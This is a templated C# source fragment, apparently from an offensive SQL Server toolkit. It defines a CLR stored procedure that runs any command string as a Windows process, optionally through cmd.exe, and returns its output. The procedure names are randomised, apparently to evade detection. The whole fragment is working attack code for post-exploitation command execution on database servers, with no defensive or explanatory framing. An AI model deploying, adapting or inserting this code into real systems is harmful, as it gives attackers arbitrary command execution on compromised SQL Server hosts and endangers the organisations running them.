{% if section == "globals" %}
    using System;
    using System.Diagnostics;
{% elif section == "text" %}
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void {{ "cmd_exec_fn" | RNDVAR }}(SqlString execCommand)
    {
        Process proc = new Process();
        {% if shell %}
            proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
            proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand);
        {% else %}
            string[] cmd = execCommand.Value.Split(' ');
            proc.StartInfo.FileName = cmd[0];

            if(cmd.Length > 1){
                var segment = new ArraySegment<string>(cmd, 1, cmd.Length - 1);
                proc.StartInfo.Arguments = String.Join(" ", segment);
            }
        {% endif %}
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();

        string output = proc.StandardOutput.ReadToEnd().ToString();
        {{ "response_fn" | RNDVAR }}(output);

        proc.WaitForExit();
        proc.Close();
    }
{% endif %}
